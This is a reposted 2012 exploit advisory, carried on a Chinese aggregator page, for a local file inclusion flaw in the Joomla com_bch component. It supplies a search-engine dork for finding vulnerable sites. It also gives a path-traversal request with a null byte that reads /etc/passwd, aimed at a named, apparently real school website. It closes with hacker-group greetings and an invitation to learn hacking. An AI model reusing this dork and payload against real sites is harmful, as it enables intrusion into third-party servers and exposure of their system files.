Joomla Component com_bch LFI Vulnerability

来源:互联网 发布:云计算运维好找工作吗 编辑:程序博客网 时间:2024/05/22 03:50

很多CMS用的这个。很给力的

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. [ Joomla Component com_bch LFI Vulnerability ]
  2.  
  3. [x] Author : the_cyber_nuxbie
  4. [x] Home : www.thecybernuxbie.com
  5. [x] E-mail : staff@thecybernuxbie.com
  6. [x] Found : 24 January 2012.
  7. [x] Tested : Windows 7 Ultimate.
  8. [x] Dork : inurl:"/index.php?option=com_bch"
  9. ________________________________________________________________
  10. ****************************************************************
  11.  
  12. [x] Vuln Exploit Report:
  13. http://localhost/index.php?option=com_bch&controller=[LFI]
  14.  
  15. - Example Website Vuln:
  16. http://trunghocvungtauhaingoai.com/index.php?option=com_bch&controller=../../../../../../../../../../../../../etc/passwd%00
  17.  
  18. [x] N0T35:
  19. 0day no more...
  20. "n0 d0rk f0r k1dd10ts"
  21.  
  22. - Thanks To All Exploiters From Indonesian:
  23. Akatsuchi, AntiSecurity, Arianom, bius, blackraptor, bumble_be, c4uR, cr4wl3r, cyberlog, Don Tukulesto,
  24. EA Ngel, eidelweiss, Flyff666, Gendenk, gunslinger_, h4ntu, h010ng, IbnuSina, irvian, Jack, k1ngk0n9, k1tk4t, k4mtiez,
  25. K-159, kecemplungkalen, M3NW5, Mbah_Semar, mywisdom, NoGe, NTOS-Team, Oli Bekas, OoN_Boy, Pokeng, S3T4N, s4va,
  26. skulmatic, spykit, Sudden_death, team_elite, tempe_mendoan, the_day, tomplixsee, vanzay, v3n0m, vir0e5, Vrs-hCk, vYc0d,
  27. Xr0b0t, y3d1ps, Z190T, etc...
  28.  
  29. - Nuxploits Security Project:
  30. [ www.thecybernuxbie.com ] <-- Learn Hack with Us...!!!
  31.  
  32. January, 24 2012, GMT +07:36 Solo Raya, Indonesia.

原创粉丝点击